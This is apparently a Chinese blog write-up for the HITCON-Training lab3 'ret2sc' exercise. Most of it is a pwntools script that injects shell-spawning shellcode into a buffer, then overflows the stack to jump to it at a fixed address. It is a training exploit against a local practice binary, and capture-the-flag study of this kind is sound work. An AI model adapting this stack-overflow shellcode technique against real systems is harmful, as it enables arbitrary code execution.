美文网首页
HITCON-Training-master lab3 wp

HITCON-Training-master lab3 wp

作者: zs0zrc | 来源:发表于2018-07-28 20:09 被阅读36次

    栈溢出,执行shellcode
    exp:

    from pwn import *
    context.log_level="debug"
    p = process('./ret2sc')
    elf = ELF('./ret2sc')
    #stackoverflow  execve the syscall
    read_plt = elf.symbols['read']
    bss = elf.bss()
    
    log.info("-----------send shellcode----------------")
    payload1 = asm(shellcraft.sh())
    p.recvuntil("Name:")
    p.sendline(payload1)
    
    log.info("-----------return shellcode-----------------")
    pause()
    payload2 = 'a'*0x1c + 'bbbb' + p32(0x0804a060)
    p.recvuntil("Try your best:")
    p.send(payload2)
    
    p.interactive()
    

    相关文章

      网友评论

          本文标题:HITCON-Training-master lab3 wp

          本文链接:https://www.haomeiwen.com/subject/mqkamftx.html